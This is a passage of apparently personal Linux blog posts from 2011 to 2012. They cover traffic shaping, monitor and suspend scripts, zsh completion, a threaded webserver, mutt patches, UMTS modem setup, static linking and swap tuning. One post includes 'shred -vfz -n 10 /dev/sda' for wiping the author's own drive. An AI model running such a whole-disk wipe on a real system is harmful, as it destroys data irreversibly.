So I set out to try fq_codel locally first, that is: limiting my Wifi output rate to the supposed output rate of my cable modem and then re-do the same upload.

With tc-commands, this resolves to this:

IF=wlan0
tc qdisc del dev $IF root
tc qdisc add dev $IF root handle 1: htb
tc class add dev $IF parent 1: classid 1:1 htb rate 125kbps
tc qdisc add dev $IF parent 1:1 handle 10: fq_codel
tc filter add dev $IF protocol ip prio 1 u32 match ip dst 0.0.0.0/0 flowid 1:1

And guess what happens? The upload that took 45.7 seconds before now takes 46.9 seconds; but the median ping times are around 30ms as opposed to ~140ms. (Also, consider that the packet loss is down to 0% as opposed to 1.5% before.) So this is really nice:

Bufferbloat / CoDel

I hope I can test this with my colleagues using a fresh CeroWRT install next week such that we can control all the parameters and do more accurate measurements.

Update: The default 13 parameter to the root handle HTB qdisc that was present in the original version of this post is unnecessary and was thus removed.

posted 2012-05-28 ∴ tagged linux and bufferbloat

New screens

I have a pair of new monitors (Dell U2312HM, find them here). I used to have one somewhat cheap 18.5" widescreen with 1366x768 (which is the same resolution as my Thinkpad X220), but reading long texts or working long hours really tired my eyes a lot.

The new screens have nice 23" IPS panels with great viewing angles. But most important of all, I can adjust the height of the screens and rotate them. Now my desk looks like this:

The X220 can only have two monitors connected at once. Also, the Docking Station's DVI output is single link. Thus, I connect one of the monitors via VGA and the other via DVI.

I use a simple shell script that is invoked when I press Fn+F7. Note that you have to turn off the LVDS1 internal display first before you can activate the two screens at once.

if [ $(xrandr -q | grep -c "   1920x1080      60.0 +") -eq 2 ]; then
  xrandr --output LVDS1 --off
  xrandr --output HDMI3 --auto --rotate left --output VGA1 --auto --right-of HDMI3 --primary
else
  xrandr --output VGA1 --off --output HDMI3 --off
  xrandr --output LVDS1 --auto
fi

posted 2012-05-19 ∴ tagged x220 and linux

minimizing Linux filesystem cache effects

Last weekend I toyed around a bit and tried to write a shared object library that can be used via LD_PRELOAD to minimize the effect a program has on the Linux filesystem cache.

Basically the use case is that you have a productive system running, and you don't want your backup script to fill the filesystem cache with mostly useless information at night (files that were cached should stay cached). I didn't test whether this brings measurable improvements yet.

The coding was really fun and provided me with yet another insight how the simple concept of file descriptors in UNIX is just great. (GNU software is tough, though: I got stuck once, and found help on Stackoverflow, which I had never used before.)

posted 2012-02-09 ∴ tagged linux, c and hack

shredding

I'm currently shredding my old X41's hard drive, because I want to sell it (if you are interested, contact me). I'm overwriting it with zeros, ten passes:

$ shred -vfz -n 10 /dev/sda

Luckily, the disk was fully encrypted all the time. So it's just a precaution.

posted 2012-01-30 ∴ tagged x41 and linux

Ten Years of Vim

About ten years ago, I began using Vim. Since about eight years ago, I have been using Vim for every email, every piece of code, literally every text I write. Today, I want to write a short text about how I came to use Vim and what I like about it.

I don't really remember when I first used Vim. It must have been around the time when I was programming PHP a lot. I had access to a "real" computer at home – running Windows XP – in 2002 for the first time; before that, I could only use older Macintoshs. It's typical for first-time Vi users to stumble into believing – by hear-say, I guess – that it is indeed a really superior editor, until they try it out the first time and can't even save, because they don't know how to. That were my first experiences too, probably.

Anyhow, at some point in time I ditched PHP Zend Studio for SciTE. Later, I got to know Vim (i.e., by reading a tutorial about it and actually understanding it) and was instantly hooked. Probably, the guys over at #html.de talked me into it. Ironically, I used Vim before I ever used a UNIX-like operating system.

In my Vim learning curve, I identify seven important advances:

Understanding the Modes Concept. – This, of course, is something everybody needs to grok. It's fairly straight-forward, once you think about it.
Understand the Visual Mode and Yank/Paste. – Line-wise selection already gives you more power than a regular editor when moving code.
Understand Mappings and Macros. – Even today I am amazed how few people automate things. If it's one line, do it manually. If it's three lines, carefully think about the task while recording a macro for it!
Unterstanding Windows. – Multiple files and stuff.
Consequently using [h], [j], [k], [l]. – This actually was a much bigger step that you might think. I went to great lengths to achive this: I configured the arrow mapping to :echoerr a message. Today, I configure all programs to use Vim key bindings, especially for horizontal and vertical navigation. It's the first thing to do. I only use the arrow keys for Mplayer seeking.
Using Text Objects. – See :help text-objects, if you don't know about them.
Switching to a US keyboard layout. – Once you do this, all the Vim commands begin to make sense. (I used a German layout before.)

Steps 1–5 happened in the first two years. The text object only came with more recent Vim development, and I'm not quite sure when I adopted them. Learning the US layout was around 2006, maybe.

When I switched to using Debian in 2004, using Vim for all tasks already felt natural. Of course, at that point I finally came to understand Vim not merely as a text editor, but as a philosophy. And that is what fascinates me to this day: The Vi way of editing text is much more than a set of clever key bindings. It's a language.

Vi-vs.-Emacs fight In a way, I'm really professional at using Vim. If I think of the tasks I do, I suspect there are very few superfluous keys I press during editing. I have acquired a really good intuition of how to skip to a particular line, to a particular function parameter or a certain word in a sentence. (I use [H], [M], [L] for global on-screen navigation a lot, and I heavily use the [f], [t], [F] and [T] jump commands.) Just as you don't actually think about the letters you type when you become a good typist, I don't think about what command keys I press in Normal mode. I just press them, and the cursor magically moves around to where my eyes rest. This is good.

On the other hand, I am just using core Vim features, most of which are already found in original Vi implementations. My really conservative .vimrc change history shows that I pretty much settled my editing habits. – But: I have never used a third-party plugin before. Strange as it may sound, I never felt the urge to do so. Command-T certainly looks like it could be of use; however, I usually start a new Vim instance and go with the Z Shell completion, which I suspect to be superior in more than one way, to find the file(s). – Thus I must acknowledge that there might be vast possibilities yet do discover. (Oh, and while confessing, there's another big one: I have never used Emacs. All I know about it is hear-say.)

For keyboard enthusiasts, there are two quirks with Vim: It mainly relies on Escape for mode switches, and the keys for many combinations are aligned for QWERTY layouts. There's just no way around it: while [c] and [d] are mnemonic for cut and delete, [h], [j], [k], [l] simply aren't. There's no way justify their use when switching to Dvorak, and that's why I didn't (switch). I also once tried mapping [j][j] to Escape, or using the Caps Lock key as Escape replacement; I can't really stick to using it. (I also stick to calling vim on the command line instead of a shorter alias. It is the fourth most command I type, after sudo, git, and man.)

For me, text editing is equal to using Vim. I feel like a four-year old moving a mouse when I'm forced to use another editor on other people's computers. And because text editing is really clumsy with regular text editors, I no longer wonder why people don't really bother to correct errors: the effort is just not worth it.

If I had to sum up the difference between Vim and other editors in one sentence, it is this: While other editors are great for creating text, Vim is also great at manipulating text. And text manipulation, for most programmers and authors, is what it's all about.

:wq

posted 2012-01-30 ∴ tagged linux and vim

vlock and suspend to ram

I've had weird race conditions when using vlock together with s2ram. It appears suspend to ram wants to switch VTs, while vlock hooks into the switch requests and explicitly disables them. So some of the time, the machine would not suspend, while at other times, vlock wouldn't be able to acquire the VT.

To solve this, I wrote a simple vlock plugin, which simply clears the lock mechanism, writes mem to /sys/power/state and later reinstates the locking mechanism. This plugin is called after all and new. Thus, the screen will be locked properly before suspending.

Here's my suspend.c:

#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

/* Include this header file to make sure the types of the dependencies
 * and hooks are correct. */
#include "vlock_plugin.h"
#include "../src/console_switch.h"

const char *succeeds[] = { "all", "new", NULL };
const char *depends[] =  { "all", "new", NULL };

bool vlock_start(void __attribute__ ((__unused__)) **ctx_ptr)
{
    int fd;

    unlock_console_switch();

    if((fd = open("/sys/power/state", O_WRONLY)) != -1) {
        if(write(fd, "mem", 3) == -1)
            perror("suspend: write");
        close(fd);
    }

    lock_console_switch();

    return true;
}

Simply paste it to the vlock modules folder, make suspend.so and copy it to /usr/lib/vlock/modules. I now invoke it like this:

env VLOCK_PLUGINS="all new suspend" vlock

posted 2012-01-20 ∴ tagged linux and c

Xorg, really?!

Are you fucking kidding me? You reintroduce broken behaviour that possibly has devastating security consequences and and make it the default?! Yeah I agree the "usual" X server locking approach is not the best way to do it – but to knowingly smash the security of people's computers on a grand scale... that's priceless.

(My locking solution is env USER=feh vlock -a -n, again.)

Update: Why it happened

posted 2012-01-20 ∴ tagged linux and rant

zsh: complete words from tmux pane

Today I wrote a rather cool Z-Shell completion function: It will present all words that are found in the current tmux pane in a zsh completion menu. That means you can actually complete words from the output of commands that you just executed. (In a way it's a little bit like the keeper function, without the overhead of remembering to call keeper in the first place.)

The code below defines two keybindings:

Ctrl-X t to do a prefix completion: only words from the pane that share the same prefix will be presented
Ctrl-X Ctrl-X to do a "find stuff like crazy" completion. If you see the output and just enter something from the middle of the word, it'll just as well complete. For example, if you see 176.9.247.89 somewhere in the pane, try typing .9 and hitting Ctrl-X twice. It'll complete to that IP address.

Here's the code:

_tmux_pane_words() {
  local expl
  local -a w
  if [[ -z "$TMUX_PANE" ]]; then
    _message "not running inside tmux!"
    return 1
  fi
  w=( ${(u)=$(tmux capture-pane \; show-buffer \; delete-buffer)} )
  _wanted values expl 'words from current tmux pane' compadd -a w
}

zle -C tmux-pane-words-prefix   complete-word _generic
zle -C tmux-pane-words-anywhere complete-word _generic
bindkey '^Xt' tmux-pane-words-prefix
bindkey '^X^X' tmux-pane-words-anywhere
zstyle ':completion:tmux-pane-words-(prefix|anywhere):*' completer _tmux_pane_words
zstyle ':completion:tmux-pane-words-(prefix|anywhere):*' ignore-line current
zstyle ':completion:tmux-pane-words-anywhere:*' matcher-list 'b:=* m:{A-Za-z}={a-zA-Z}'

How does it work? _tmux_pane_words will just capture the current pane's contents (capture-pane), print out the buffer that contains it (show-buffer) and then delete it again (delete-buffer). – The rest of the magic happens via Zsh's excellent completion mechanisms.

See it in action (after typing spm^X^X):

Update 2013-10-06: Daniel points out that since March ’13, there is a switch -p for capture-pane to print the contents to stdout; also, using the newly introduced -J switch, wrapped words will be joined. See his adaption here.

posted 2012-01-19 ∴ tagged zsh, tmux and linux

trying pthreads

Today I played around with POSIX threads a little. In an assignment, we have to implement a very, very simple webserver that does asynchronous I/O. Since it should perform well, I thought I'd not only serialize I/O, but also parallelize it.

So there's a boss that just accepts new inbound connections and appends the fds to a queue:

clientfd = accept(sockfd, (struct sockaddr *) &client, &client_len);
if(clientfd == -1)
    error("accept");
new_request(clientfd);

The new_request function in turn appends it to a queue (of size TODOS = 64), and emits a cond_new signal for possibly waiting workers:

pthread_mutex_lock(&mutex);
while((todo_end + 1) % TODOS == todo_begin) {
    fprintf(stderr, "[master] Queue is completely filled; waiting\n");
    pthread_cond_wait(&cond_ready, &mutex);
}
fprintf(stderr, "[master] adding socket %d at position %d (begin=%d)\n",
    clientfd, todo_end, todo_begin);
todo[todo_end] = clientfd;
todo_end = (todo_end + 1) % TODOS;
pthread_cond_signal(&cond_new);
pthread_mutex_unlock(&mutex);

The workers (there being 8) will just emit a cond_ready, possibly wait until a cond_new is signalled, and then extract the first client fd from the queue. After that, a simple function involving some reads and writes will handle the communication on that fd.

pthread_mutex_lock(&mutex);
pthread_cond_signal(&cond_ready);
while(todo_end == todo_begin)
    pthread_cond_wait(&cond_new, &mutex);
clientfd = todo[todo_begin];
todo_begin = (todo_begin + 1) % TODOS;
pthread_mutex_unlock(&mutex);

// handle communication on clientfd

(Full source is here: webserver.c.)

Now this works pretty well and is fairly easy. I'm not very experienced with threads, though, and run into problems when I do massive parallel requests.

If I run ab, the Apache Benchmark tool with 10,000 requests, 1,000 concurrent, on the webserver it'll go up to 9000-something requests and then lock up.

$ ab -n 10000 -c 1000 http://localhost:8080/index.html
...
Completed 8000 requests
Completed 9000 requests
apr_poll: The timeout specified has expired (70007)
Total of 9808 requests completed

The webserver is blocked; its last line of output reads like this:

[master] Queue is completely filled; waiting

If I attach strace while in this blocking state, I get this:

$ strace -fp `pidof ./webserver`
Process 21090 attached with 9 threads - interrupt to quit
[pid 21099] recvfrom(32,  <unfinished ...>
[pid 21098] recvfrom(23,  <unfinished ...>
[pid 21097] recvfrom(31,  <unfinished ...>
[pid 21095] recvfrom(35,  <unfinished ...>
[pid 21094] recvfrom(34,  <unfinished ...>
[pid 21093] recvfrom(33,  <unfinished ...>
[pid 21092] recvfrom(26,  <unfinished ...>
[pid 21091] recvfrom(24,  <unfinished ...>
[pid 21090] futex(0x6024e4, FUTEX_WAIT_PRIVATE, 55883, NULL

So the children seem to be starving on unfinished recv calls, while the master thread waits for any children to work away the queue. (With a queue size of 1024 and 200 workers I couldn't reproduce the situation.)

How can one counteract this? Specify a timeout? Spawn workers on demand? Set the listen() backlog argument to a low value? – or is it all Apache Benchmark's fault? *confused*

posted 2012-01-17 ∴ tagged linux and c

mutt sidebar patch improvements

It is generally accepted as an almost universal truth that mutt sucks, but is the MUA that sucks less than all others. While people use either Vim or Emacs and fight about it, I hardly see any people fight about whether mutt is good or bad. There is, to my knowledge, no alternative worth mentioning.

Mutt dates back well into the mid-nineties. As you might imagine, with lots of contributors over the course of almost two decades, the code quality is rather messy.

When development had stalled for quite a while in the mid-2000's, a fork was attempted. While mutt-ng was quite popular for a while, most changes were incorporated back into mainline mutt at some point. (Ironically, the latest article in the mutt-ng development blog is from October 2006 and is titled "mutt-ng isn't dead!"). The development of main mutt gained some momentum again, triggered in large parts by the contributions of late Rocco Rutte.

I remember two big features that the original mutt authors just wouldn't integrate into mainline: The headercache patch and the sidebar patch. About the former I can't say anything, but lately I've been fixing the Sidebar patch in various places. (We use mutt at work and rely heavily on e-mail communication, so we'd like a bug-free user agent, naturally.)

When all the mutt forking went about five years ago, I didn't know much about it. Retrospectively, I see the people did a hell of a job. Long before mutt-ng was forked, Sven told me he and Mika met in Graz for several weeks to sift and sort through the availbale patches, intending to do a "super patch".

Mutt's code quality is arguably rather messy.

There's a wild mix of 2-, 4- or 8-space indentation, often mixed with spaces (or vice versa)
The user interface is completely tangled with application logic
It uses curses directly. Go figure

On top of that, the Sidebar patch tries to make it even worse. Imagine this: mutt draws a mail from position (line=x,char=0) to the end of the line. Now the sidebar patch will introduce a left "margin", such that the sidebar can be drawn there. Thus, all code parts where a line is started from the leftmost character has to be rewritten to check if the sidebar is active and possibly start drawing at (line=x,char=20).

The sidebar code quality is a fringe case of bad code. Really, it sucks. However, there's no real way to "do it right", since original mutt never planned for a sidebar.

Who maintains the sidebar patch? – Not sure. There's a version at thomer.com, but he says:

July 20, 2006 I quit. Sadly, there seems to be no desire to absorb the sidebar patch into the main source tree.

The most up-to-date version is found at Lunar Linux. Last update is from mid-2009.

Debian offers a mutt-patched package that includes the sidebar patch, albeit in a different version than usually found 'round the net. In short, this patch is a mess, too.

But since I made all the fixes, I decided to contact the package's maintainer, Antonio Radici. He promptly responded and said he'd happily fix all the issues, so I started by opening two bug reports. Nothing has happened since.

The patches run quite stable for my colleagues, so I think it's best to release them. Maybe someone else can use them. Please note that I have absolutely no interest in taking over any Sidebar patch maintainance. ;-)

For some of the patches I provide annotations. They all feature quite descriptive commit messages, and apply cleanly on top of the Debian mutt repository's master branch.

The first four patches are not by me, they are just the corresponding patches from the debian/patches/ directory applied to have a starting point.

The first few patches fix rather trivial bugs.

Now come the performance critical patches. They are the real reason I was assigned the task to repair the sidebar:

0009-cache-time-when-sidebar-last-counted-all-the-mails.patch

This patch fixes a huge speed penalty. Previously, the sidebar would count the mails (and thus read through the whole mbox) every time that mtime > atime! This is just an incredible oversight by the developer and must have burned hundreds of millions of CPU cycles.

This introduces a member `sb_last_checked' to the BUFFY struct. It
will be set by `mh_buffy_update', `buffy_maildir_update' and
`buffy_mbox_update' when they count all the mails.

Mboxes only: `buffy_mbox_update' will not be run unless the
condition "sb_last_checked > mtime of the file" holds. This solves
a huge performance penalty you obtain with big mailboxes. The
`mx_open_mailbox' call with the M_PEEK flag will *reset* mtime and
atime to the values from before. Thus, you cannot rely on "mtime >
atime" to check whether or not to count new mail.

Also, don't count mail if the sidebar is not active:

Then, I removed a lot of cruft and simply stupid design. Just consider one of the functions I removed:

-static int quick_log10(int n)
-{
-        char string[32];
-        sprintf(string, "%d", n);
-        return strlen(string);
-}

That is just insane.

Now, customizing the sidebar format is simple, straight-forward and mutt-like:

sidebar_format

    Format string for the sidebar. The sequences `%N', `%F' and
    `%S' will be replaced by the number of new or flagged messages
    or the total size of the mailbox. `%B' will be replaced with
    the name of the mailbox. The `%!' sequence will be expanded to
    `!' if there is one flagged message; to `!!' if there are two
    flagged messages; and to `n!' for n flagged messages, n>2.

While investigating mutt's performance, one thing struck me: To decode a mail (eg. from Base64), mutt will create a temporary file and print the contents into it, later reading them back. This also happens for evaluating filters that determine coloring. For example,

color   index  black green  '~b Julius'

will highlight mail containg my name in the body in bright green (this is tremendously useful). However, for displaying a message in the index, it will be decoded to a temporary file and later read back. This is just insane, and clearly a sign that the mutt authors wouldn't bother with dynamic memory allocation.

By chance I found a glib-only function fmemopen(), "fmemopen, open_memstream, open_wmemstream - open memory as stream".

From the commit message:

When searching the header or body for strings and the
`thorough_search' option is set, a temp file was created, parsed,
and then unlinked again. This is now done in memory using glibc's
open_memstream() and fmemopen() if they are available.

This makes mutt respond much more rapidly.

0015-keep-buffer-like-temp-file-in-memory.patch

Finally, there are some patches that fix various other issues, see commit message for details.

There you go. I appreciate any comments or further improvements.

Update 1: The original author contacted me. He told me he's written most of the code in a single sitting late at night. ;-)

Update 2: The 16^th patch will make mutt crash when you compile it with -D_FORTIFY_SOURCE=2. There's a fix: 0020-use-PATH_MAX-instead-of-_POSIX_PATH_MAX-when-realpat.patch (thanks, Jakob!)

Update 3: Terry Chan contacted me. All my patches are now part of the Lunar Linux Sidebar Patch.

Update 4: The 15th patch that uses open_memstream uncovered a bug in glibc. See here and here.

posted 2012-01-08 ∴ tagged mutt, linux and c

X220's UMTS card

I've been toying around with the UMTS module in my X220 lately. I got a pre-paid SIM from blau.de, who offer 24h UMTS flatrates for 2,40 EUR. (This is probably my use case: Being somewhere without internet access for a day or two. This only happens so often, so I don't want a "real" flat.)

My UMTS card is manufactured by Sony Ericsson and connected via internal USB:

$ lsusb -v -s 004:003
    ...
    idVendor           0x0bdb Ericsson Business Mobile Networks BV
    idProduct          0x1911

The installation is easy: Just insert the SIM card behind the battery as shown here. Add yourself to the dialout group, log in again, and you're set.

You can first connect to your device using chat or picocom (which you can be terminated via C-a C-x). To ask if you can use the SIM without PIN, send the AT+CPIN? command:

$ picocom /dev/ttyACM0
...
AT+CPIN?
+CPIN: READY

If you're not ready to go, I would disable the PIN request using a regular phone. (I did.)

Dialling out is easy. I set up two profiles in the /etc/wvdial.conf that allow me to switch between "pay per megabyte" and "dayflat":

[Dialer blau]
Modem = /dev/ttyACM0
Init1 = AT+CGDCONT=1,"IP","internet.eplus.de"
Stupid mode = 1
phone= *99#
Username = blau
Password = blau

[Dialer tagesflat]
Modem = /dev/ttyACM0
Init1 = AT+CGDCONT=1,"IP","tagesflat.eplus.de"
Stupid mode = 1
phone= *99#
Username = blau
Password = blau

The rest happens automatically, once you invoke wvdial blau or wvdial tagesflat. (Note you have to execute these with root privileges because they want to modify pppd-related config files.) Most probably you want the follow-up command route add default dev ppp0 to route all traffic via the ppp0 interface.

In a test run I got a downstream speed of 190KB/s (city perimeter). Working over SSH is not painful at all.

I also played around with gammu a little bit.

$ gammu --identify
Device               : /dev/ttyACM0
Manufacturer         : Lenovo
Model                : unknown (F5521gw)
Firmware             : R2A07

The Wammu interface is nice, it can even receive SMS. But sending SMSes failed so far:

$ echo "Das ist ein Test" | gammu --debug textall --debug-file /tmp/gammu \
    sendsms TEXT +491785542342
...
1 "AT+CMGS=28"
2 "> 079194710716000011000C919471584532240000FF10C4F01C949ED341E5B41B442DCFE9^Z"
3 "+CMS ERROR: 500"

... which is somewhat of an "generic error". Maybe sending SMS is not supported at all. I'll look into that later.

Also, I'll have a look whether my Card supports GPS information retrieval. Thinkwiki claims a similar model does this. Interesting.

Update: Actually, I forgot one thing. I keep the following two entries in my /etc/wvdial.conf:

[Dialer on]
Modem = /dev/ttyACM0
Init1 = AT+CFUN=1

[Dialer off]
Modem = /dev/ttyACM0
Init1 = AT+CFUN=4

The actual sequence is now: wvdial on && wvdial blau. The AT+CFUN=1 will activate the radio equipment, which is necessary. And, suddenly, also SMS delivery works! :-)

posted 2011-12-22 ∴ tagged x220, umts and linux

New X220

I got a brand new Thinkpad X220 on thursday. I'm not much into hardware, I think it should mainly work. I have a model with 4 GB of RAM, an i7 at 2.7 GHz, UMTS preinstalled, SSD instead of a HDD and an IPS panel. It's a really nifty thing.

Paying the extra money for the SSD is totally worth it. Everything happens instantaneous. The bootup process is down to five seconds. The IPS panel is really worth it, too. ThinkPads have long been criticized for their bad displays – with the new panel at full brightness, my regular screen looks really dim and grey...

The Debian netinstall works smoothly. I haven't come around to testing all the stuff like the DisplayPort connectors, Bluetooth, UMTS, USB 3.0. But the usual stuff works out of the box.

However, there are major problems with the power management of both the graphics card and the whole system, the latter one being a regression in the recent 3.0 and 3.1 kernel series regarding ASPM. Currently I'm using the 3.1.0-1-amd64 kernel with the pcie_aspm=force boot parameter. I cannot really see a difference in power consumtion when varying this parameter, though.

A major thing, however, is re-enabling the RC6 mode of the graphics chip. This alone saves more than 4W when the computer is in an idle state. My /etc/modprobe.d/i915-kms.conf looks like this now:

options i915 modeset=1
options i915 i915_enable_rc6=1
options i915 i915_enable_fbc=1
options i915 lvds_downclock=1

Suspend/resume works fine, no flickering effects. I use the following command to find out the current power consumption:

while sleep 1; do
    awk '{printf"%.2f\n",$1/-1000}' < /sys/devices/platform/smapi/BAT0/power_now;
done

This requires the tp_smapi kernel module to be loaded. With full brightness (0) and while writing this blog article, the consumption is at ~12W; with medium brightness (8) it's ~8.5W; at the lowest brightness (15) it's ~8W; With the display completely turned off, it's ~6.5W. There are people who claim they only have an ~5.4 power consumption. If you have any other hints on this or if you own an X220 yourself, I'd be interested in the details.

posted 2011-12-10 ∴ tagged x220 and linux

GUI simplicity vs. UNIX simplicity

I ranted about the new Unity interface some weeks ago. On several occasions thereafter, I had to help people solve problems they had using some sort of graphical user interface.

Example I: I was debugging a broken VPN connection. The connection settings were managed by the KDE network manager, which is rather easy to use. Internally, of course, the network manager just writes out some temporary configuration files and starts the PPP daemon with a lot of custom flags. That's all fine if it works – but in this case it didn't work. It just said: "connection failed", no diagnostics given. (The solution was to enable MPPE, which itself was trivial: ticking the corresponding box. How did I find this out? Tailing /var/log/dmesg while connecting. It said right there: MPPE not enabled, but server side requires it.)
Example II: The gnome network manager somehow fucked up. Even now I don't know why. It says "connecting", and then nothing happens. No diagnostics.

UNIX is simple. It really is. There is a reasonable and easy-to-follow philosophy behind it. But UNIX requires the user to know what he wants to do, and read error messages. UNIX simplicity is not the same as iPhone simplicity.

Eric S. Raymond wrote this set of rules that should guide UNIX program design. In this context, two important rules stick out (emphasis mine):

Rule of Silence: When a program has nothing surprising to say, it should say nothing.

Rule of Repair: When you must fail, fail noisily and as soon as possible.

Although this is of course mostly aimed at text user interface programs, you can get an important point here. Most GUIs adhere to the Rule of Silence quite well – in fact so well that they seldom say anything at all!

Since many UNIX GUIs invoke text-interface programs under the hood, it should be a necessity to be able to view how those program failed. Luckily, most TUI programs provide descriptive error messages. If they are hidden in the GUI there are two effects:

the "regular" user sees that something fails, and
the admin looking at the problem sees that something fails and pulls out his hair trying to find out what – so that he can repair it!

I don't use GUI programs at all, except for a Browser (Vimperator/Firefox), a PDF viewer (Zathura) and The GIMP. Mostly, this is because of usability considerations. But also, I'm afraid to use a computer where I cannot see what is happening. And that's exactly the case with GUIs that do stuff that can fail: I don't know what they are doing and why they are failing!

I the end I always go the extra mile and read up on the PPP daemon, for example. This wouldn't be necessary if GUIs had a switch to do some really verbose logging. That would help tremendously. Plus a button to display that log. Should be easy, shouldn't it?

posted 2011-11-24 ∴ tagged unix and linux

dead code easter egg

I was just researching on how the file format of the xt_recent module works. That's where I found this nice easter egg: instead of writing down the size of an IPv6 address plus one, they simply used a dummy string +b335:1d35:1e55:dead:c0de:1715:5afe:c0de", reading "beesides less dead code it is safe code". Hehe.

posted 2011-10-02 ∴ tagged linux

statically linking dwm against X11 and XCB

Today, virtually all binaries used on linux systems are dynamically linked to several libraries. While it is commonly accepted statically linking applications is bad – most notably in terms of security concerns: fixing a library's bug means you won't have to recompile all applications that are using that special library, they'll simply load the version available at run-time – there are in fact good reasons to use static linking. (And for those who claim statically linked binaries occupy much disk space: yeah, sure. As if a few megs compared to a few hundred kilobytes make that much a difference today, plus you don't have the overhead of looking up and loading the libs in the first place.)

As I mentioned in my post about tmux already, there's a huge advantage to static linking: you can compile bleeding edge software with bleeding edge library functions and still use them on reasonably outdated systems (think: Debian stable).

One division of rapidly evolving software I could never successfully link statically was window managers like dwm or awesome. However, especially considering the XCB development and adoption over the past few years, to me it makes perfect sense. I'll just distribute a copy of the window manager I use to different systems and have a guarantee it'll work there, no matter the libxcb version (or if it's available at all).

Usually, however, it's not possible to just pass a -static or -Wl,-Bstatic flag to the compiler (in my case, gcc). It'll fail to find several symbols that are located in libraries that don't have to be explicitly linked in. Such an error message might look like this:

/usr/lib/libXinerama.a(Xinerama.o): In function `find_display':
(.text+0x89): undefined reference to `XextCreateExtension'
/usr/lib/libXinerama.a(Xinerama.o): In function `XineramaQueryScreens':
(.text+0x255): undefined reference to `XMissingExtension'

To find the appropriate library, you may try to use pkg-config. I use a different approach, however. I have a shell function defined called findsym (beware, Z-Shell specialties apply):

findsym () {
  [[ -z $1 ]] && return 1
  SYMBOL=$1
  LIBDIR=${2:-/usr/lib}
  for lib in $LIBDIR/*.a
  do
    nm $lib &> /dev/null | grep -q $SYMBOL && \
      print "symbol found in $lib\n -L$LIBDIR -l${${lib:t:r}#lib}"
  done
}

Thus, I can simply go looking for the missing XMissingExtension symbol like this:

$ findsym XMissingExtension
symbol found in /usr/lib/libXext.a
 -L/usr/lib -lXext
symbol found in /usr/lib/libXi.a
 -L/usr/lib -lXi
symbol found in /usr/lib/libXinerama.a
 -L/usr/lib -lXinerama
symbol found in /usr/lib/libXrandr.a
 -L/usr/lib -lXrandr

Now, I use the readme file, some common sense or symple try'n'error to find out which library I'd best link in, too. In this case, it's adding a simple -lXext to the LDFLAGS part.

Thus, I come up with the following diff to dwm's config.mk:

--- a/config.mk
+++ b/config.mk
@@ -16,7 +16,7 @@ XINERAMAFLAGS = -DXINERAMA

 # includes and libs
 INCS = -I. -I/usr/include -I${X11INC}
-LIBS = -L/usr/lib -lc -L${X11LIB} -lX11 ${XINERAMALIBS}
+LIBS = -L/usr/lib -L${X11LIB} -static -lX11 ${XINERAMALIBS} -lxcb -lXau -lXext -lXdmcp -lpthread -ldl

 # flags
 CPPFLAGS = -DVERSION=\"${VERSION}\" ${XINERAMAFLAGS}

There's one important point here: libX11 will (to me, it seems, inevitably) load another library, not sure why or which one. Thus, it is vitally important to statically link in libdl, the library that dynamically loads another library. Otherwise, the follwing error messages appear:

/usr/lib/libX11.a(CrGlCur.o): In function `open_library':
(.text+0x3b): undefined reference to `dlopen'
/usr/lib/libX11.a(CrGlCur.o): In function `fetch_symbol':
(.text+0x6b): undefined reference to `dlsym'
/usr/lib/libX11.a(CrGlCur.o): In function `fetch_symbol':
(.text+0x88): undefined reference to `dlsym'

With the above modification to config.mk, dwm will compile and link just fine:

$ file dwm
dwm: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),
statically linked, for GNU/Linux 2.6.18, not stripped

You can reduce the binary's size by a few hundred kilobytes by manually calling strip(1).

The binary works very well for me. I'll try to use it on different systems over the next few weeks and see what happens. If that works out well, I'll also try to get lucky with awesome and zathura, as these (and the libraries needed) are not installed on many systems, either.

posted 2011-08-05 ∴ tagged dwm, linux and static-linking

Tuning old hardware with slow hard drive

My main work machine is a pretty old X41 with a 40GB hard disk and 512MB of RAM. It is more than five years old and is not without problems. (In recent months, I have to try several before switching it on successfully – in most cases, it just beeps twice and displays "Keyboard error, <F1> to configure" and the keyboard doesn't work.)

However, there's a thing which annoys me a lot: bad performance. I use a resource-friendly window manager with some urxvts running. Apart from the memory-hog Firefox, I very seldom use any graphical application (ie. any program using the GTK or Qt libraries).

For some weeks now I've been trying this cgroups hack, with mixed results. In some cases, the performance is better, sometimes it's not.

How bad could the overall performance be, then? – Unfortunately, very bad. Which has, in part, to do with my slow hard disk. It does uncached reading with 18MB/s in theory:

$ sudo hdparm -t /dev/sda
/dev/sda:
 Timing buffered disk reads:   56 MB in  3.08 seconds =  18.21 MB/sec

In reality, it's rather some 16.5MB/s:

$ dd if=/dev/zero of=./zero bs=1048576 count=256
256+0 records in
256+0 records out
268435456 bytes (268 MB) copied, 10.0246 s, 26.8 MB/s

$ time cat zero > /dev/null
cat zero > /dev/null  0.01s user 0.25s system 1% cpu 16.246 total

Now, I have to live with this (SSD's are still very expensive!). The main problem here is that the Kernel swaps out data that wasn't accessed for a while (although, from a naïve perspective, there's no ultimate need to do so since there's still free memory left).

I actually notice that with two programs regularly:

When I hadn't taken a look at Firefox for a few minutes, it might take up to 10(!) seconds to redraw the window.
When I hadn't opened an urxvt for some time, opening a new one might take up to 5 seconds; initializing the shell another two.

Now I always thought this was the Linux Kernel being stupid. However I discovered a switch today. From the sysctl.vm documentation:

swappiness

This control is used to define how aggressive the kernel will swap
memory pages.  Higher values will increase agressiveness, lower values
decrease the amount of swap.

The default value is 60.

Debian (like all other distros) seem to keep this default value. After reading up on some articles I set vm.swappiness=0 in /etc/sysctl.conf. (You can do this interactively with sysctl -w vm.swappiness=0 also. Interestingly, Ubuntu recommends a value of 10 for desktop systems.)

For the past day or so, I have been monitoring the output of vmstat 1 every now and then (especially the swap in/out parameters si and so). But even after the first hour one thing is evident: the interactive system performance is much, much better. It feels like a machine upgrade.

Terminals open instantly (because the initialization parts of their binary doesn't get swapped out, for example). Switching to Firefox is instant. Switching tabs is fast. The system feels a lot more responsive.

Where's the drawback, then? If you could magically tune your system's performance, why wouldn't you want do that?

A case where this setup will give you a headache is when you actually do run out of memory. I easily accomplished that by opening Gimp on a huge (blank) file. Now, working with Gimp is easy now; switching to Firefox takes ages (heavy swapping). So there a not-so-agressive swapping policy would be better if you switch between several memory-hogging applications a lot.

(Side note: When there's a lot of free memory left – for example after closing Gimp – the kernel step by step swaps in certain blocks again, a few every second so as to not disturb system performance. I saw this going on for several minutes on a otherwise completely idle system.)

